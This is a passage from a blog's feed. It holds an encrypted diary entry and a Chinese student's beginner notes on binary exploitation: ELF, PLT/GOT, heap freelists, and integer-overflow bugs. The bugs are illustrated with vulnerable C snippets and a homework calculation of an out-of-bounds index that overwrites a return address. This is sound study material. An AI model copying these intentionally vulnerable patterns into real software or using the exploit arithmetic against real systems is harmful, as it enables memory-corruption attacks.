    <summary type="html">&lt;h1 id=&quot;VPN实验&quot;&gt;&lt;a href=&quot;#VPN实验&quot; class=&quot;headerlink&quot; title=&quot;VPN实验&quot;&gt;&lt;/a&gt;VPN实验&lt;/h1&gt;&lt;h3 id=&quot;【实验描述】&quot;&gt;&lt;a href=&quot;#【实验描述】&quot; class=&quot;headerlink&quot; title=&quot;【</summary>
      
    
    
    
    
    <category term="笔记" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/%E7%AC%94%E8%AE%B0/"/>
    
  </entry>
  
  <entry>
    <title>日记·杂记</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/11/19/ri-ji-za-ji/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/11/19/ri-ji-za-ji/</id>
    <published>2024-11-18T16:00:00.000Z</published>
    <updated>2024-12-16T03:44:14.713Z</updated>
    
    <content type="html"><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">  <script id="hbeData" type="hbeData" data-hmacdigest="912b7c6929e67d89e6346ae222f6bfc1e3d5301f179cf6df37fd1c0fa815d53a">8dbb8363a7960e2e7bd1ace2a9de9af22b8e20d48d5faa1def0f1c5e7868327d164641525f67afcbbc955bb62ea9658d892a385045bc70b6d58075be022c9f79286942d0ca2db997c53d1ba5d17da6536bacd84598fa8b25862b838f9051a5ae203eea2a59aa992ac66c6e353750116287d953da96da6a5537449ce541b08ebfd2327802ebf39599b181bd19d7ff7960b4e49f97854fa8549240bfd05fa21d919d1e5f31b51770e34c39f32b809c29efd8e68109540eb331b39917308ae7b9a76dd2300d2e5289da9f06cca89dc106f668262af748ca4140778cb7d8dc95f6cee97bdf37c200938043bf9132e46f6adbf8f57a5112530b2ccb1e50030be313f4593dd8c366b2e017fbf52d5a2cceb51baef1a88ad9042b5df5f76bfd239132d9e6da9c5ced8f0a449d980b5875cc62ad20067548a9f4aef86d5456badb65ddf1b1bfaafd9cca6d2cd9ce3813aebc83bccd75f042a9c59f5e1bd1f165ac00f875e2eccc289f088963c077fe70ed0b3193a8ac678d108ad99551d66b0afa7c71333b366e64906fdfc028c3d16587852c1139050364af2c97e2432b0f4ba73023a27aa299cd4f5d45eac5b3c5bad2b515a5c8384bdef7b0aa80f5229e7067fb2f31</script>  <div class="hbe hbe-content">    <div class="hbe hbe-input hbe-input-default">      <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">      <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">        <span class="hbe hbe-input-label-content hbe-input-label-content-default">You must enter the password to read.</span>      </label>    </div>  </div></div><script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
    
    
    <summary type="html">This blog is encrypted.</summary>
    
    
    
    
    <category term="日记" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/%E6%97%A5%E8%AE%B0/"/>
    
  </entry>
  
  <entry>
    <title>Pwn入门阶段小结</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/11/10/pwn-ru-men-jie-duan-xiao-jie/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/11/10/pwn-ru-men-jie-duan-xiao-jie/</id>
    <published>2024-11-09T16:00:00.000Z</published>
    <updated>2024-12-16T03:43:57.131Z</updated>
    
    <content type="html"><![CDATA[<h1 id="Pwn入门阶段小结"><a href="#Pwn入门阶段小结" class="headerlink" title="Pwn入门阶段小结"></a>Pwn入门阶段小结</h1><p>一编：</p><p>意外看到这本书决定开始学到开始学，不到半小时；认认真真看到堆之前，用了半个月；回顾这本书，似乎填充了半年的快乐。</p><p>其实之前有学过小半个月的pwn尝试，ctfshow刷到54题（似乎）不知怎的，停下了就再也没有往后做。</p><p>从做题开始学，总感觉学的支离破碎；虽说看书本的话，似乎也只是知道一些理论知识。想着毕竟有一点点逆向和pwn那五十多道题基础，再看书，定是会有新的收获。</p><p>苦恼于书上的东西怎么搬到博客里，前几天看到 Jmp.Cliff 师傅直播，用自己的思考写最近他读的linux内核书。或许我也应该这样去做个小小的阶段性总结。</p><p>本想着读完这本书再写，卡到堆了。jc老师说最好去读glibc源码，看到老师博客里正好有一篇，提到前期基础要打好。这里也算是重新思考+总结这几天的学习成果。</p><p>同样感谢找到该书电子版的YuQ1ng队友👍（感恩，在他指导下做出了第一道栈迁移题目）</p><p>二编：</p><p>从头看之前在书上写的笔记，感觉，前后呼应颇多，也正好回答之前留下的一些问题——</p><p>三编：</p><p>最近软件安全课程的学习，发现对内容有了更多的丰富！打算加进来！！</p><p>四编： 搁置了好久（私密马赛（orz（12&#x2F;10（这周必补完）</p><h2 id="1-二进制文件"><a href="#1-二进制文件" class="headerlink" title="1. 二进制文件"></a>1. 二进制文件</h2><h3 id="1-1-从源码到可执行文件"><a href="#1-1-从源码到可执行文件" class="headerlink" title="1.1 从源码到可执行文件"></a>1.1 从源码到可执行文件</h3><h4 id="1-1-1-编译原理"><a href="#1-1-1-编译原理" class="headerlink" title="1.1.1 编译原理"></a>1.1.1 编译原理</h4><p>很好，又到了我们最爱的编译原理环节</p><p>编译器的作用是读入以某种语言（源语言）编写的程序，输出等价的另一种语言（目标语言）编写的程序。编译器结构可分为<strong>前端（Front end）</strong>和<strong>后端（Back end）</strong>两部分。前端是机器无关的，把我们写的源程序分解成组成要素和响应的语法结构，创建源程序的中间表示，收集和源程序相关的信息，存放到<strong>符号表</strong>；后端是机器相关的，根据中间表示和符号表信息构造目标程序。</p><p>以GCC编译阶段举例：</p><p>预处理–编译（词法分析–语法分析–语义分析–中间代码生成和优化–代码生成和优化）–汇编–链接</p><ul><li><p>预处理：处理源代码中以“#”开始的预处理指令，转换后插入到程序中。</p><ul><li>递归处理“#include”预处理指令，将对应文件的内容复制到该指令的位置</li><li>删除所有的“#define”指令，并且在其被应用的位置递归地展开所有的宏定义（或替换）</li><li>删除所有注释</li><li>添加行号和文件名标识</li></ul></li><li><p>编译</p><blockquote><p>TODO: 这里提一嘴 AT&amp;T格式和intel格式：</p><p>TODO: <a href="https://blog.csdn.net/zoomdy/article/details/80700750?fromshare=blogdetail&sharetype=blogdetail&sharerId=80700750&sharerefer=PC&sharesource=m0_73495245&sharefrom=from_link">cfi_* 汇编指示符</a></p></blockquote><ul><li>词法分析：</li></ul></li><li><p>汇编</p><blockquote><p>TODO：可重定向文件</p><p>重定位是链接符号定义与符号引用的过程。可重定位文件在构建可执行文件或目标文件时，需要把节中的符号引用换成这些符号在进程空间中的虚拟地址。</p><p>符号绑定和重定位攻击在后续的ret2dl-entries</p></blockquote><p>汇编器根据汇编指令与机器指令对照表进行翻译，此生成的目标文件是可重定位文件</p></li><li><p>链接</p><p>包括地址和空间分配、符号绑定和重定位等操作。</p></li></ul><h3 id="1-2-ELF文件格式"><a href="#1-2-ELF文件格式" class="headerlink" title="1.2 ELF文件格式"></a>1.2 ELF文件格式</h3><blockquote><p>TODO： 不是？看了这个wiki的ELF文件，讲的很详细，有时间读一遍。</p></blockquote><p>扔一个</p><p><a href="https://ctf-wiki.org/executable/elf/structure/basic-info/">ELF 文件 - CTF Wiki</a></p><p>ELF分三种格式：</p><ul><li>可执行文件（.exec）</li><li>可重定位文件（.rel）</li><li>共享目标文件（.dyn）</li><li>*核心转储文件（core Dump file）</li></ul><p>链接视角：</p><p>​文件头（ELF header）：存在魔术字符（确定映射地址）</p><p>​节头表（section header table）：</p><ul><li>代码（.text）：保存可执行的机器指令</li><li>数据（.data）：保存已初始化的全局变量和局部静态变量</li><li>BSS （.bss）：保存未初始化的全局变量和局部静态变量（Block starting symbol）</li><li>*.got: 全局偏移量表（全局变量引用的地址）</li><li>*.got.plt：全局偏移量表（too），但是用于保存函数引用的地址</li><li>.plt ： 过程链接表，用于延迟绑定</li></ul><blockquote><p>segment和section的区别：</p><p>当我们在审视一个目标文件时，有两种视角可供参考，一是链接视角，通过节（section）来进行划分；另一种是运行视角，通过段（segment）来划分。</p><p>一段多节一段多节</p></blockquote><h4 id="运行视角看目标程序链接过程："><a href="#运行视角看目标程序链接过程：" class="headerlink" title="运行视角看目标程序链接过程："></a>运行视角看目标程序链接过程：</h4><p>首先需要将该文件和动态链接库装在到进程空间中，形成一个<strong>进程镜像</strong>。</p><p>进程镜像中，仅仅包含各个段是不够的，还需要用到栈、堆、cDSO等空间，这些空间同样通过权限来进行访问控制，从而保证程序运行时的安全。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111175729613.png" alt="image-20241111175729613"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111175708135.png" alt="image-20241111175708135"></p><h3 id="1-3-静态链接与动态链接"><a href="#1-3-静态链接与动态链接" class="headerlink" title="1.3 静态链接与动态链接"></a>1.3 静态链接与动态链接</h3><p>两个或者多个不同的目标文件是如何组成一个可执行文件的呢？这就需要进行链接（linking）。</p><ul><li>编译时链接（compile time）</li><li>加载时链接（load time）</li><li>运行时链接（run time）</li></ul><p>多文件链接方法：</p><ul><li>按序叠加</li><li>相似节合并</li></ul><p>静态链接在每一次调用位置都要装载一次代码，多个相同的库造成内存空间的浪费</p><p>为了引入RELRO保护机制，GOT被拆分为.got节和.got.plt节两个部分！不需要延迟绑定的前者用于保存全局变量引用，加载到内存后被标记为只读；需要延迟绑定的后者则用于保存函数引用，具有读写权限。</p><h4 id="延迟绑定"><a href="#延迟绑定" class="headerlink" title="延迟绑定"></a>延迟绑定</h4><p>ELF文件通过过程链接表（Procedure Linkage Table，PLT）和GOT配合来实现延迟绑定，每个被调用的库函数都有一组对应的PLT和GOT。</p><p>位于代码段.plt节的PLT是一个数组，每个条目占16字节。PLT[0]跳转动态链接器，PLT[1]调用系统启动函数__libc_start_main()，（main函数在此调用），PLT[2]开始就是被调用的各个函数条目。</p><p>位于数据段.got.plt节的GOT也是数组，每个条目占8字节。GOT[0]和GOT[1]包含动态连接器在解析函数地址时所需要的两个地址（.dynamic和relor条目），GOT[2]是动态连接器ld-linux.so的入口点，从GOT[3]开始，就是被调用的各个函数条目，这些条目默认只想对应PLT条目的第二条指令，完成绑定后次啊会被修改为函数的实际地址。</p><h2 id="2-汇编基础"><a href="#2-汇编基础" class="headerlink" title="2. 汇编基础"></a>2. 汇编基础</h2><h3 id="2-1-CPU架构与指令集"><a href="#2-1-CPU架构与指令集" class="headerlink" title="2.1 CPU架构与指令集"></a>2.1 CPU架构与指令集</h3><p>指令集架构（Instruction Set Architecture，ISA）简称指令集，包含了一系列的操作码（opcode），以及由特定CPU执行的基本指令。指令集在CPU中的实现成为微架构，要想设计CPU，首先得决定使用是么阳得指令集，然后次啊是设计硬件电路。根据指令集得特征，通常分为CISC和RISC两大阵营。</p><p>处理器：指令集、寄存器、寻址方式</p><h3 id="2-2-x86-x64汇编基础"><a href="#2-2-x86-x64汇编基础" class="headerlink" title="2.2 x86&#x2F;x64汇编基础"></a>2.2 x86&#x2F;x64汇编基础</h3><h4 id="CPU操作模式："><a href="#CPU操作模式：" class="headerlink" title="CPU操作模式："></a>CPU操作模式：</h4><p>对于x86，主要的操作模式：保护模式、是地址模式和系统管理模式（此外还有一个保护模式的子模式，称为虚拟8086模式）</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111182608986.png" alt="image-20241111182608986"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111182619779.png" alt="image-20241111182619779"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111182629819.png" alt="image-20241111182629819"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111182647511.png" alt="image-20241111182647511"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111182719219.png" alt="image-20241111182719219"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111182728885.png" alt="image-20241111182728885"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111182728885.png"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111182749928.png" alt="image-20241111182749928"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111182758825.png" alt="image-20241111182758825"></p><h4 id="语法风格："><a href="#语法风格：" class="headerlink" title="语法风格："></a>语法风格：</h4><p>AT&amp;T和Intel</p><h4 id="寄存器和数据类型："><a href="#寄存器和数据类型：" class="headerlink" title="寄存器和数据类型："></a>寄存器和数据类型：</h4><p>寄存器：</p><p>整数常量：</p><p>数据传送与访问</p><p>算术运算与逻辑运算</p><p>跳转指令与循环指令</p><h4 id="栈与函数调用"><a href="#栈与函数调用" class="headerlink" title="栈与函数调用"></a>栈与函数调用</h4><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111182531820.png" alt="image-20241111182531820"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111182540909.png" alt="image-20241111182540909"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111182551863.png" alt="image-20241111182551863"></p><h2 id="3-Linux安全机制"><a href="#3-Linux安全机制" class="headerlink" title="3. Linux安全机制"></a>3. Linux安全机制</h2><h3 id="3-1-Linux基础"><a href="#3-1-Linux基础" class="headerlink" title="3.1 Linux基础"></a>3.1 Linux基础</h3><h4 id="字节序："><a href="#字节序：" class="headerlink" title="字节序："></a>字节序：</h4><p>eg：12345678</p><p>小端：</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&gt; x/<span class="number">2</span>w <span class="number">0</span>xffffd584</span><br><span class="line"><span class="number">0</span>xffffd584:  <span class="number">0</span>x34333231   <span class="number">0</span>x38373635</span><br><span class="line">&gt; x/<span class="number">8</span>wb  <span class="number">0</span>xffffd584</span><br><span class="line"><span class="number">0</span>xfffd584:  <span class="number">0</span>x31 <span class="number">0</span>x32 <span class="number">0</span>x33 <span class="number">0</span>x34 <span class="number">0</span>x35 <span class="number">0</span>x36 <span class="number">0</span>x37 <span class="number">0</span>x38</span><br><span class="line">&gt; x/s <span class="number">0</span>xffffd584</span><br><span class="line"><span class="number">9</span>xfffd584:  &quot;<span class="number">12345678</span>&quot;</span><br></pre></td></tr></table></figure><p>内核接口、用户接口</p><h4 id="调用约定"><a href="#调用约定" class="headerlink" title="调用约定"></a>调用约定</h4><h3 id="3-2-Stack-Canaries"><a href="#3-2-Stack-Canaries" class="headerlink" title="3.2 Stack Canaries"></a>3.2 Stack Canaries</h3><h3 id="3-3-No-eXecute"><a href="#3-3-No-eXecute" class="headerlink" title="3.3 No-eXecute"></a>3.3 No-eXecute</h3><h3 id="3-4-ASLR和PIE"><a href="#3-4-ASLR和PIE" class="headerlink" title="3.4 ASLR和PIE"></a>3.4 ASLR和PIE</h3><h3 id="3-5-FORTIFY-SOURCE"><a href="#3-5-FORTIFY-SOURCE" class="headerlink" title="3.5 FORTIFY_SOURCE"></a>3.5 FORTIFY_SOURCE</h3><h3 id="3-6-RELRO"><a href="#3-6-RELRO" class="headerlink" title="3.6 RELRO"></a>3.6 RELRO</h3><h2 id="4-整数安全"><a href="#4-整数安全" class="headerlink" title="4 整数安全"></a>4 整数安全</h2><h3 id="4-1整数溢出"><a href="#4-1整数溢出" class="headerlink" title="4.1整数溢出"></a>4.1整数溢出</h3><h4 id="定义"><a href="#定义" class="headerlink" title="定义"></a>定义</h4><p>整数溢出一般有三个情况</p><ul><li>溢出：有符号数会发生溢出，有符号数的最高位标识符号，在两正或两负相加时，有可能改变符号位的值，产生溢出；此时OF标志位可能显示溢出</li><li>回绕：无符号数0-1时会变成最大的数，；此时标志位CF可能显示回绕</li><li>截断：将一个较大宽度的数存入一个宽度较小的操作数中，存在高位截断</li></ul><h4 id="漏洞多发函数"><a href="#漏洞多发函数" class="headerlink" title="漏洞多发函数"></a>漏洞多发函数</h4><p>&lt;经常配合其他类型的缺陷才能有用&gt;</p><p>size_t类型的参数（size_t时无符号整数类型sizeof()的结果）</p><p>memcpy()函数将src所指向的字符串中以ssrc地址开始的前n个字节复制到dest所指向的数组中，并返回dest；</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="type">void</span> *<span class="title function_">memcpy</span><span class="params">(<span class="type">void</span> *dest, <span class="type">const</span> <span class="type">void</span> *src, <span class="type">size_t</span> n)</span>;</span><br></pre></td></tr></table></figure><p>strncpy()函数从源src所指的内存地址的起始位置开始复制n个字节到目标dest所指的内存地址的起始位置中；</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="type">char</span> *<span class="title function_">strmcpy</span><span class="params">(<span class="type">char</span> *dest, <span class="type">const</span> <span class="type">char</span> *src, <span class="type">size_t</span> n)</span>;</span><br></pre></td></tr></table></figure><p>两个函数中都有类型为size_t的参数，它是无符号整型的sizeof运算符的结果</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="type">unsigned</span> <span class="type">int</span> <span class="type">size_t</span>;</span><br></pre></td></tr></table></figure><h4 id="来点例题："><a href="#来点例题：" class="headerlink" title="来点例题："></a>来点例题：</h4><h5 id="整数转换"><a href="#整数转换" class="headerlink" title="整数转换"></a>整数转换</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span>[<span class="number">80</span>];</span><br><span class="line"><span class="type">void</span> <span class="title function_">vulnerable</span><span class="params">()</span>&#123;</span><br><span class="line">  <span class="type">int</span> len = read_int_from_network();</span><br><span class="line">  <span class="type">char</span> *p = read_string_from_network();</span><br><span class="line">  <span class="keyword">if</span>(len&gt;<span class="number">80</span>)&#123;</span><br><span class="line">    error(<span class="string">&quot;tooooooooooo large!&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">memcpy</span>(buf,p,len)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>类似例题：<br><a href="https://www.nssctf.cn/problem/709">[BJDCTF 2020]babystack2.0</a></p><h5 id="回绕和溢出"><a href="#回绕和溢出" class="headerlink" title="回绕和溢出"></a>回绕和溢出</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">vulnerable</span><span class="params">()</span>&#123;</span><br><span class="line">  <span class="type">size_t</span> len;</span><br><span class="line">  <span class="type">char</span>* buf;</span><br><span class="line">  len =  read_int_from_network();</span><br><span class="line">  buf = <span class="built_in">malloc</span>(len+<span class="number">5</span>);</span><br><span class="line">  read(fd,buf,len);</span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>类似例题：</p><p>来自作业里的一道题：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image.png" alt="img"></p><blockquote><p>atol() 常用于将用户输入的字符串或命令行参数（通常是字符串）转换为 long 类型的数值，以便进行后续的计算或处理。<br>先看可能会出现的问题：</p></blockquote><ul><li>Insertint函数的数组越界：在堆中，index超过了分配大小，数组越界，进而引发未定义行为（UB）<br>一道堆溢出，而且告知了利用的bar函数位置，没有任何保护（一定要在winXP中），</li></ul><p>选择0x12ff84作为第一个参数：栈的返回值的地址为 0x12FF84<br>计算偏移：<br>$$<br>参考数组元素地址 &#x3D; 数组基址+下标*数组元素大小<br>$$</p><ul><li>要想覆盖到 0x0012FF84，必须要使前两位溢出才可以。因此列出算式：<br> 0x410048 + index * 4 &#x3D; 0x10012FF84<br> 解得 index &#x3D; 1072988111，bar 的地址转为十进制即 4198400<br> 利用漏洞执行 bar()函数成功：<br> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-1.png" alt="img"></li></ul><p>另一道：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="type">void</span> <span class="title function_">validate_passwd</span><span class="params">(<span class="type">char</span> *passwd)</span>&#123;</span><br><span class="line">    <span class="type">char</span> passwd_buf[<span class="number">11</span>];</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> passwd_len = <span class="built_in">strlen</span>(passwd); <span class="comment">//strlen被储存在无符号字符串类型中</span></span><br><span class="line">    <span class="keyword">if</span>(passwd_len&gt;=<span class="number">4</span>&amp;&amp;passwd_len &lt;=<span class="number">8</span>)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;good!\n&quot;</span>);</span><br><span class="line">        <span class="built_in">strcpy</span>(passwd_buf,passwd);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;bad!\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc,<span class="type">char</span> *argv[])</span>&#123;</span><br><span class="line">    validate_passwd(argv[<span class="number">1</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="截断"><a href="#截断" class="headerlink" title="截断"></a>截断</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[])</span>&#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">short</span> <span class="type">int</span> total;</span><br><span class="line">    total = <span class="built_in">strlen</span>(argv[<span class="number">1</span>])+<span class="built_in">strlen</span>(argv[<span class="number">2</span>])+<span class="number">1</span>;</span><br><span class="line">    <span class="type">char</span> *buf = (<span class="type">char</span> *)<span class="built_in">malloc</span>(total);</span><br><span class="line">    <span class="built_in">strcpy</span>(buf,argv[<span class="number">1</span>]);</span><br><span class="line">    <span class="built_in">strcat</span>(buf,argv[<span class="number">2</span>]);</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>例题：</p><p>还没找到（？</p><h2 id="5-格式化字符串"><a href="#5-格式化字符串" class="headerlink" title="5 格式化字符串"></a>5 格式化字符串</h2><h3 id="5-1-格式化输出函数"><a href="#5-1-格式化输出函数" class="headerlink" title="5.1 格式化输出函数"></a>5.1 格式化输出函数</h3><h3 id="5-2-格式化字符串漏洞"><a href="#5-2-格式化字符串漏洞" class="headerlink" title="5.2 格式化字符串漏洞"></a>5.2 格式化字符串漏洞</h3><h2 id="6-栈溢出与ROP"><a href="#6-栈溢出与ROP" class="headerlink" title="6 栈溢出与ROP"></a>6 栈溢出与ROP</h2><h3 id="6-1-栈溢出原理"><a href="#6-1-栈溢出原理" class="headerlink" title="6.1 栈溢出原理"></a>6.1 栈溢出原理</h3><h3 id="6-2-ROP"><a href="#6-2-ROP" class="headerlink" title="6.2 ROP"></a>6.2 ROP</h3><h3 id="6-3-Blink-ROP"><a href="#6-3-Blink-ROP" class="headerlink" title="6.3 Blink ROP"></a>6.3 Blink ROP</h3><h3 id="6-4-SROP"><a href="#6-4-SROP" class="headerlink" title="6.4 SROP"></a>6.4 SROP</h3><h3 id="6-5-stack-pivoting"><a href="#6-5-stack-pivoting" class="headerlink" title="6.5 stack pivoting"></a>6.5 stack pivoting</h3><h3 id="6-6-red2dl-resolve"><a href="#6-6-red2dl-resolve" class="headerlink" title="6.6 red2dl-resolve"></a>6.6 red2dl-resolve</h3><h2 id="7-堆"><a href="#7-堆" class="headerlink" title="7 堆"></a>7 堆</h2><h3 id="7-1-堆的内存组织"><a href="#7-1-堆的内存组织" class="headerlink" title="7.1 堆的内存组织"></a>7.1 堆的内存组织</h3><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111180457191.png" alt="image-20241111180457191"></p><p>堆表：一般位于整个堆区的开始位置，用于索引队去中所有堆块的重要信息，包括腿快的位置、腿快大小、空闲还是占用等；在设计时，可能会采用平衡二叉树等高校数据结构用于优化查找效率。现代操作系统的堆表往往不止一种数据结构；在Windows系统中，占有态的堆块被使用它的程序索引，堆表只索引所有空闲态的堆块。</p><p>堆块：是堆的基本组织单位，包括块首和块身两个部分。块首标识堆块自身信息；堆身紧随其后，是最终分配给用于使用的数据区。</p><p>堆块指针：指向堆块的指针或者句柄，指向的是块身的首地址，也就是，我们使用函数申请得到的地址指针都会越过8字节(32位系统)的块首，直接指向数据区(块身)。</p><p>堆块大小：堆块的大小包括块首在内，如果申请32字节，实际会分配40字节，即8字节的块首+32字节的块身。堆块的单位是8字节，不足8字节按8字节分配。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111180513957.png" alt="image-20241111180513957"></p><p>堆表有两种常见的结构：</p><ol><li>空闲双向链表Freelist（简称空表）</li><li>快速单向链表Lookaside（简称快表）</li></ol><p>其中快表一般难以被利用，故不作详述。</p><p>空表包含空表索引和空闲堆块两个部分，</p><p>空表索引也叫空表表头，是一个大小为128的指针数组，该数组的每一项包括两个指针，用于标识一条空表。 （如图左一列</p><p><strong>空表索引的第一项free[0]所标识的空表相对比较特殊，这条双向链表链入了所有大于或等于1024字节小于512KB的堆块，升序排列。这个空表通常又称为零号空表。</strong></p><p>空表索引的第二项（free[1]）标识了堆中所有大小为8字节的空闲堆块。</p><p>之后每个索引项指示的空闲堆块递增8字节。例如， free[2]为16字节的空闲堆块， free[3]为 24 字节的空闲堆块。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111180711815.png" alt="image-20241111180711815"></p><p>依据既定的查找空闲堆块的策略，找到合适的空闲堆块之后，将其状态修改为占用态、把它从堆表中“卸下”、返回一个指向堆块块身的指针给程序使用。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241111181213462.png" alt="image-20241111181213462"></p><p><strong>普通空表</strong>分配时首先寻找最优的空闲块分配，若失败，一个稍大些的块会被用于分配。这种次优分配发生时，会先从大块中按请求的大小精确地“割”出一块进行分配，然后给剩下的部分重新标注块首，链入空表。也就是说，空表分配存在找零钱的情况。</p><p><strong>零号空表</strong>中按照大小升序链着大小不同的空闲块，故在分配时先从free[0]反向查找最后一个块（即最大块），看能否满足要求，如果满足要求，再正向搜索最小能满足要求的空闲堆块进行分配。</p><p>eg：</p><blockquote><p>对于如下代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> * p1 = <span class="keyword">new</span> <span class="type">int</span>[<span class="number">200</span>];</span><br><span class="line"><span class="type">char</span> * p2 = <span class="keyword">new</span> <span class="type">char</span>[<span class="number">30</span>];</span><br></pre></td></tr></table></figure><p>我们可以从以下几个方面来解释“为何分配到堆”和“为何不可确认 <code>p1</code> 和 <code>p2</code> 的大小”：</p><h3 id="1-为何分配到堆？"><a href="#1-为何分配到堆？" class="headerlink" title="1. 为何分配到堆？"></a>1. 为何分配到堆？</h3><p>代码中的 <code>new</code> 操作符用于动态分配内存。默认情况下，<code>new</code> 操作符会在堆中分配指定大小的内存空间。因此：</p><ul><li><code>int* p1 = new int[200];</code> 会在堆上分配 200 个 <code>int</code> 类型的空间。</li><li><code>char* p2 = new char[30];</code> 会在堆上分配 30 个 <code>char</code> 类型的空间。</li></ul><p>堆内存分配可以在运行时根据需求动态分配和释放，与栈不同的是，栈的内存分配是在编译时就确定的，并在函数作用域结束时自动回收。</p><h3 id="2-为何不可确认-p1-和-p2-的大小？"><a href="#2-为何不可确认-p1-和-p2-的大小？" class="headerlink" title="2. 为何不可确认 p1 和 p2 的大小？"></a>2. 为何不可确认 <code>p1</code> 和 <code>p2</code> 的大小？</h3><p>指针变量 <code>p1</code> 和 <code>p2</code> 是指向内存地址的指针，并没有记录数组的大小信息，因此<strong>仅通过指针变量本身无法得知所指向的内存块的大小</strong>。即：</p><ul><li><code>p1</code> 的类型是 <code>int*</code>，只是一个指向 <code>int</code> 